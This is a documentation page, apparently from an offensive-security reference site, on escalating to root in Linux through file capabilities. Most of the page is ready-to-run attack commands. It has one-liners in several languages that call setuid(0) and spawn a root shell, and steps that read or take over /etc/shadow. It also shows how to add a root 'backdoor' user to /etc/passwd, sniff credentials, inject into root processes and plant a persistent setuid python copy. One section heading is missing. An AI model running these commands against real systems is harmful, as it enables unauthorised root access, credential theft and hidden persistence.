Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Linux capabilities split root privileges into smaller units. A binary with specific capabilities can perform privileged operations without being SUID root.

Find Binaries with Capabilities

getcap -r / 2>/dev/null

Dangerous Capabilities

cap_setuid (ep)

Binary can change its UID → instant root.

python

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

perl

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'

ruby

ruby -e 'Process::Sys.setuid(0); exec "/bin/bash"'

php

php -r 'posix_setuid(0); system("/bin/bash");'

node

node -e 'process.setuid(0); require("child_process").spawn("/bin/bash", {stdio: [0,1,2]})'
Bypass file read permission checks. Read any file.

tar

tar czf /tmp/shadow.tar.gz /etc/shadow
tar xzf /tmp/shadow.tar.gz
cat etc/shadow

openssl (custom binary)

openssl enc -in /etc/shadow

cap_dac_override

Bypass file write permission checks. Write to any file.

python

import os
os.setuid(0)  # if also cap_setuid
# Or write directly
with open('/etc/passwd', 'a') as f:
    f.write('backdoor:$(openssl passwd -1 password):0:0::/root:/bin/bash\n')

vim

vim /etc/shadow

cap_chown

Change ownership of any file. 
# If python has cap_chown
python3 -c 'import os; os.chown("/etc/shadow", 1000, 1000)'
cat /etc/shadow

cap_fowner

Bypass permission checks on file owner operations. 
# Change permissions on any file
chmod 777 /etc/shadow

cap_net_raw

Capture network traffic. Sniff credentials. 
tcpdump -i any -w /tmp/capture.pcap

cap_net_bind_service

Bind to privileged ports (< 1024). Useful for phishing/MitM. 
python3 -m http.server 80

cap_sys_ptrace

Attach to any process. Inject code into root process. 
# Find root process
ps aux | grep root

# Inject shellcode via gdb or custom tool
python3 inject.py <ROOT_PID>

cap_sys_admin

Mount filesystems, various admin operations. 
mount /dev/sda1 /mnt
cat /mnt/etc/shadow

Set Capabilities (If Root — Persistence)

cp /usr/bin/python3 /tmp/python3
setcap cap_setuid+ep /tmp/python3
Later: 
/tmp/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Quick Reference

CapabilityImpactExploit
cap_setuidChange UID to rootpython3/perl/ruby setuid(0)
cap_dac_read_searchRead any filetar to exfil /etc/shadow
cap_dac_overrideWrite any fileModify /etc/passwd
cap_chownOwn any filechown shadow to user
cap_fownerchmod any filechmod 777 /etc/shadow
cap_net_rawSniff traffictcpdump credentials
cap_sys_ptraceInject into processAttach to root PID
cap_sys_adminMount filesystemsMount /dev/sda, read shadow